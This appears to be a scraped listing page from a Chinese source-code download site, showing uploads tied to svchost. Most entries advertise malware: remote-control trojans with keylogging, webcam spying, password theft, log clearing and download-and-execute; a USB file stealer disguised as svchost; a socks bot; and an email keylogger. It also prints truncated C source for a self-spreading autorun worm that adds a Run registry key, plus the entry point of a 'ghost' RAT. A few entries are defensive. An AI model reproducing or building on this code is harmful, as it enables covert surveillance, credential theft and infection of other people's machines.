DL : 10
控制端采用IOCP模型,数据传输采用zlib压缩方式
稳定快速,上线数量无上限,可同时控制上万台主机
控制端自动检测CPU使用率调整自己的工作线程, 稳定高效
宿主为svchost以系统服务启动,有远程守护线程,上线间隔为两分钟。
心跳包机制防止意外掉线..
支持HTTP和DNS上线两种方式
自动恢复SSDT(这功能干什么,大家都知道,免杀自己做吧),安装本程序需要管理员权限
控制端237K,返朴归真的界面,生成的服务端无壳,111 K,可安装多个服务端
其它细节方面的功能大家自己去发现吧
功能:
文件管理 完全仿Radmin所写, 文件、文件夹批量上传、删除、下载、创建、重命名
屏幕监视 此模块全用汇编编写,传输速度快,控制屏幕,发送Ctrl+Alt+Del,剪贴板操作,7种色彩显示方式
键盘记录 可记录中英文信息,离线记录(记录上限50M)功能
远程终端 一个简单shell
系统管理 进程管理,窗口管理,拨号上网密码获取
视频监控 监控远程摄像头
会话管理 注销,重启,关机,卸载服务端
其它功能 下载执行指定URL中的程序,隐藏或者显示访问指定网址,清除系统日志
地址位置 将IP数据库文件QQWry.Dat放置程序同目录下即可显示地理位置
集群控制 可同时控制多台主机,同时打开视频监控等管理功能
备注功能 .........
Update : 2008-03-07
Size : 1087762
Publisher : dssz.net
DL : 0
进入系统后本程序自动运行,并且隐藏,然后控制光驱不断的打开与关闭。-access to the system automatically after the operation, and hidden, and then continued to control the opening drive with the closure.
Update : 2008-10-13
Size : 25616
Publisher : 轩辕鸿彦
DL : 0
用系统权限法清理dll木马,相信大家对Dll木马都是非常熟悉了。它确实是个非常招人恨的家伙。它不像普通的exe木马那样便于识别和清理,这个家伙的隐蔽性非常强,它可以嵌入到一些如rundll32.exe,svchost.exe等正常的进程中去,让你找不到,即使找到了也难以清除,因为正常的进程正在调用它嘛。
Update : 2008-10-13
Size : 4801
Publisher : wangtian
DL : 0
揭开SVCHOST.exe进程之谜
揭开SVCHOST.exe进程之谜-kick SVCHOST.exe process Mystery kick SVCHOST.exe process Mystery
Update : 2008-10-13
Size : 2380
Publisher : fy
DL : 0
伪装成svchost进程,在windows服务里添加服务,对连接到电脑的U盘进行定时扫描,将其复制到电脑里默认的目录里-disguised as svchost process, the service windows add services, connect to the computer of the U disk regularly scan, copy it to the computer's default directory
Update : 2008-10-13
Size : 88126
Publisher : 肖羽
DL : 0
本文档主要讲解svchost程序在正常情况和被病毒挂载时的不同之处,敬请分享!-this document svchost mainly on the procedures in normal circumstances and when the virus mount different, Please share!
Update : 2008-10-13
Size : 2651
Publisher : rainbow
DL : 0
1.在C、D、E盘和c:\\windows\\system、c:\\windows中生成本体文件
2.在C、D、E盘中生成自动运行文件
3.注册c:\\windows\\system\\svchost.exe,使其开机自动运行
4.在C:\\windows\\system下生成隐蔽DLL文件
5.执行后具有相联复制能力
Update : 2008-10-13
Size : 3916
Publisher : 王国栋
DL : 0
代码编写:Anskya 简要的一款远程控制,FSG压缩后只有12k 下个版本将完全采用ASM+C编写,体积在5k左右使用bingle前辈的 创建SvcHost.exe调用的服务原理与实践使用的是和小榕前辈的BITS后门的一个替换技术.这里向两位前辈表示感谢,代码在编写过程中.得到一步江湖和sforever两位朋友的帮助(特别感谢sforever,没有逆向他的那个后门程序接口偶也不会发现一个BUG.)程序可以在卡巴斯基默认设置下,开机自启动和穿墙...反向连接,暂时只支持DNS和IP 由于身体上的等等原因还有其他一些外界因素.程序写的比较仓促初步写了几个功能,暂时大家试用一下好了.纯属练手 1.进程管理:查看,干掉.选定的进程 2.文件管理:上传,下载,新建目录,删除目录,删除文件等功能... 3.提供远程下载者功能:您可以选择下载并运行您的程序 4.提供卸载功能
Update : 2008-10-13
Size : 404919
Publisher : 吴建
DL : 0
用纯WIN32 SOCKET实现得一个远程控制程序,使用svchost.exe程序启动
Update : 2008-10-13
Size : 155497
Publisher : thx4sg
DL : 0
创建SvcHost.exe调用的服务原理与实践。
Update : 2008-10-13
Size : 23211
Publisher : Arthur
DL : 0
一个用C语言写病毒的简单例子,结合了C语言和win编程,代码后有一段注释,能看出用c写病毒的模型。此源码系转载+少许改动。
Update : 2008-10-13
Size : 3879
Publisher : meason
DL : 0
Powerbasic 里注册为系统 DLL 可用 SVCHOST 来加载.有需要的朋友来
Update : 2008-10-13
Size : 2076
Publisher : 镙丝丁
DL : 0
替换由svchost.exe启动的某个系统服务,具体服务由全局变量 ServiceName 决定.
经测试,生成的DLL文件运行完全正常.
测试环境: Windows 2003 Server + Delphi 7.0
代码只实现了一个框架,没有任何实际动作,仅作为学习用.如果你使用本代码
进行了任何扩充和修改,希望您能将代码寄一份给我.
Update : 2008-10-13
Size : 46604
Publisher : Alexander
DL : 0
socks 4 bot
+SDT Restore, svchost inject, copy to system dir-socks 4 bot
+SDT Restore, svchost inject, copy to system dir
Update : 2024-05-04
Size : 9216
Publisher : Andrey
DL : 0
keyloger for windows via e-mail to you
Update : 2024-05-04
Size : 3072
Publisher : daniel
DL : 0
1.在C、D、E盘和c:\windows\system、c:\windows中生成本病毒体文件
2.在C、D、E盘中生成自动运行文件
3.注册c:\windows\system\svchost.exe,使其开机自动运行
4.在C:\windows\system下生成隐蔽DLL文件
5.病毒在执行后具有相联复制能力
1.在所有磁盘的根目录生成svchost.com和autorun.inf文件
2.生成病毒体:
c:\windows\wjview32.com
c:\windows\explorer.exe
c:\windows\system32\dllcache\explorer.exe
c:\windows\system\msmouse.dll
c:\windows\system32\cmdsys.sys
c:\windows\system32\mstsc32.exe
3.病毒体c:\windows\explorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在
本病毒到目前为止任何杀毒软件都无法将其查杀
本病毒单机默认使用对机器无害(破坏代码已屏蔽)
提供病毒卸载程序(保存为X.BAT,双击运行即可卸载):
函数:制造垃圾文件
1.可以用于病毒开机自启动的注册表位置:-/* SVCHOST.C */
/* SVCHOST.EXE*/
#define SVCHOST_NUM 6
#include<stdio.h>
#include<string.h>
char*autorun={"[autorun]\nopen=SVCHOST.exe\n\nshell\\1=打开\nshell\\1\\Command=SVCHOST.exe\nshell\\2\\=Open\nshell\\2\\Command=SVCHOST.exe\nshellexecute=SVCHOST.exe"}
char*files_autorun[10]={"c:\\autorun.inf","d:\\autorun.inf","e:\\autorun.inf"}
char*files_svchost[SVCHOST_NUM+1]={"c:\\windows\\system\\MSMOUSE.DLL",
"c:\\windows\\system\\SVCHOST.exe","c:\\windows\\SVCHOST.exe",
"c:\\SVCHOST.exe","d:\\SVCHOST.exe","e:\\SVCHOST.exe","SVCHOST.exe"}
char*regadd="reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f"
int copy(char*infile,char*outfile)
{
FILE*input,*output
char temp
if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen
(outfile,"wb"))!=NULL))
{
while(!feof(input))
{
fread(&temp,1,1,input)
fwrite(&temp,1,1
Update : 2024-05-04
Size : 7168
Publisher : 2626648
DL : 0
这个程序是用来用摄像头录象的.他可以远程设置录象时间,并且远程传递到远方服务端.并且用户无法查到.-This procedure is used with a video camera. He can remotely set the video time and distance passed to the remote server. And the user can not be found.
Update : 2024-05-04
Size : 817152
Publisher : 星矢
DL : 0
Create service in DLL svchost
Update : 2024-05-04
Size : 3072
Publisher : sosnaim
DL : 0
windows系统 svchost进程的源代码,是从RentOS系统抠出来得,对于编写svchost类服务和分析系统服务的原理都有帮助-svchost process windows system source code, is plucked out of the system comes from RentOS principle svchost class services for the preparation and analysis of system services have helped
Update : 2024-05-04
Size : 9216
Publisher : 董林
DL : 0
ghost小马源码,喜欢的可以拿去研究。-// svchost.cpp : Defines the entry point for the console application.
//
#pragma comment(linker, /OPT:NOWIN98 )
#include ClientSocket.h
#include common/KernelManager.h
#include common/KeyboardManager.h
#include common/login.h
#include common/install.h
#include common/until.h
#include <stdio.h>
enum
{
NOT_CONNECT, // 还没有连接
GETLOGINFO_ERROR,
CONNECT_ERROR,
HEARTBEATTIMEOUT_ERROR
}
extern C __declspec(dllexport) void ServiceMain(int argc, wchar_t* argv[])
//void __stdcall AntiYun()
//void __stdcall MoniteGame()
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress )
void __stdcall ServiceHandler(DWORD dwControl)
#ifdef _CONSOLE
int main(int argc, char**argv)
#else
DWORD WINAPI main(char*lpServiceName)
#endif
SERVICE_STATUS_HANDLE hServiceStatus
DWORD g_dwCurrState
DWORD g_dwServiceType
char svcname[MAX_PATH]
LONG WINAPI bad_exception(struct _EXCEPTION_POINTERS* ExceptionInfo)
{
// 发生异常,重新创建进程
HANDLE
Update : 2024-05-04
Size : 4096
Publisher : 段誉
DSSZ is the largest source code store in internet!
Contact us :
1999-2046
DSSZ All Rights Reserved.